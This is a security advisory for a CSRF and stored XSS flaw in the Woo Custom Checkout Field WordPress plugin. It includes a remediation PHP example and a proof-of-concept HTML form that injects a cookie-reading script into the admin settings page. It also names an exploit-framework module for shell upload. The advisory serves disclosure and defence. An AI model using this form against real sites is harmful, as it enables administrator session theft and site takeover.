Woo Custom Checkout Field <= 1.3.2 CSRF + Stored XSS Disclosure

Datetime: 2016-08-22 21:55:20          Topic: XSS Vulnerability

Homepage

https://wordpress.org/plugins/woo-custom-checkout-field/

Overview

The plugin's admin settings page (wp-admin/admin.php?page=ccf_settings_menu) accepts new checkout field definitions via POST without a nonce, so a logged-in administrator who loads an attacker-controlled page can be made to submit the form shown in the proof of concept below. The ccf_insert function (line 118 of include/ccf.php) stores the submitted values as received, and template/datagrid.php echoes them back without entity encoding, so the stored payload executes in the context of an admin user when the grid is rendered.

CVSS Score

5.2

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:W/RC:C)

Versions Affected

1.3.2 and below

Solution

At the time of disclosure no official fix had been published by the vendor, nor had the vendor acknowledged the issue.

A simple, temporary workaround for the XSS vulnerability is to wrap every value output by template/datagrid.php in a call to htmlentities (see http://php.net/manual/en/function.htmlentities.php for usage). Pass ENT_QUOTES and the charset explicitly, e.g. htmlentities($value, ENT_QUOTES, 'UTF-8'), since the default flags on PHP versions current at the time leave single quotes unencoded; within WordPress the equivalent helpers are esc_html() for element content and esc_attr() for attribute values.

To fix the CSRF vulnerability, the form must carry a nonce (wp_nonce_field) and the ccf_insert function must verify it (check_admin_referer or wp_verify_nonce) before storing anything, see https://codex.wordpress.org/WordPress_Nonces for examples. A nonce is not an authorization check, so the handler should also confirm the caller's capability with current_user_can().
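The following is an added illustration of both fixes together, written for this page; it is not the plugin's own code. The POST field names and the admin page slug are taken from the advisory, while the option storage (ccf_fields), the allowed field types, the capability used, and the ccf_render_add_field_form / ccf_render_datagrid / ccf_post helper names are assumptions made to keep the example self-contained.

```php
<?php
// Added example, not the plugin's code. Hardened form, insert handler and
// datagrid output for the issues described in this advisory.
// Assumptions: field definitions live in the 'ccf_fields' option, the
// allowed types list, the 'manage_woocommerce' capability, and the helper
// names ccf_post(), ccf_render_add_field_form(), ccf_render_datagrid().

// Read one POST value as a plain string (WordPress adds slashes to $_POST).
function ccf_post( $key ) {
    return isset( $_POST[ $key ] ) ? (string) wp_unslash( $_POST[ $key ] ) : '';
}

// 1. CSRF fix, form side: every submission must carry a nonce bound to this
//    action. A form hosted on an attacker's site cannot obtain one.
function ccf_render_add_field_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=ccf_settings_menu' ) ); ?>">
        <?php wp_nonce_field( 'ccf_add_field', 'ccf_nonce' ); ?>
        <input type="text" name="txt_field_name" value="">
        <input type="text" name="txt_field_class" value="">
        <input type="text" name="txt_field_placeholder" value="">
        <input type="text" name="txt_field_type" value="text">
        <input type="text" name="txt_field_options" value="">
        <input type="submit" name="add_field" value="Submit">
    </form>
    <?php
}

// 2. CSRF fix, handler side: verify nonce and capability before storing,
//    and sanitize each value on the way in (defense in depth).
function ccf_insert() {
    if ( ! isset( $_POST['add_field'] ) ) {
        return;
    }
    // Dies with WordPress's "link has expired" page on a missing/invalid nonce.
    check_admin_referer( 'ccf_add_field', 'ccf_nonce' );

    // The nonce proves intent, not authorization; still check the capability.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    $allowed_types = array( 'text', 'textarea', 'select', 'checkbox' ); // assumed
    $type          = ccf_post( 'txt_field_type' );

    $field = array(
        'name'        => sanitize_key( ccf_post( 'txt_field_name' ) ),
        // A CSS class may only contain [A-Za-z0-9_-]; this drops the PoC payload.
        'class'       => sanitize_html_class( ccf_post( 'txt_field_class' ) ),
        'placeholder' => sanitize_text_field( ccf_post( 'txt_field_placeholder' ) ),
        'type'        => in_array( $type, $allowed_types, true ) ? $type : 'text',
        'options'     => sanitize_text_field( ccf_post( 'txt_field_options' ) ),
    );

    $fields   = get_option( 'ccf_fields', array() ); // assumed storage
    $fields[] = $field;
    update_option( 'ccf_fields', $fields );
}

// 3. XSS fix: escape for the context each value is emitted in. esc_html()
//    for element content, esc_attr() inside attribute values. This is what
//    stops an already-stored payload from executing, regardless of how it
//    got into the database.
function ccf_render_datagrid( array $fields ) {
    echo '<table class="widefat">';
    foreach ( $fields as $f ) {
        printf(
            '<tr data-type="%s"><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>',
            esc_attr( $f['type'] ),
            esc_html( $f['name'] ),
            esc_html( $f['class'] ),
            esc_html( $f['placeholder'] ),
            esc_html( $f['options'] )
        );
    }
    echo '</table>';
}
```

Input sanitization alone is not sufficient: records stored before the fix was applied still carry the payload, so the output escaping in ccf_render_datagrid is the control that actually neutralises the stored XSS, and the nonce plus capability check is what closes the CSRF path by which an attacker gets the payload stored in the first place.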

Proof of Concept

<!-- Hosted on an attacker-controlled page and submitted while a WordPress administrator is logged in to the target; the browser attaches the admin's session cookies and the plugin performs no nonce check. -->
<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">  
    <input type="text" name="txt_field_name" value="field_name">
    <!-- The payload is stored as the field's CSS class and echoed back unencoded by template/datagrid.php. -->
    <input type="text" name="txt_field_class" value="<script>alert(document.cookie);</script>">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

WordPress Exploit Framework Module

exploits/woo_custom_checkout_field_xss_shell_upload

WPVDB-ID

Pending

Disclosure Timeline

  • 2016-07-23 : Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
  • 2016-07-25 : No response from vendor, contacting WordPress to report issue.
  • 2016-07-26 : Public disclosure
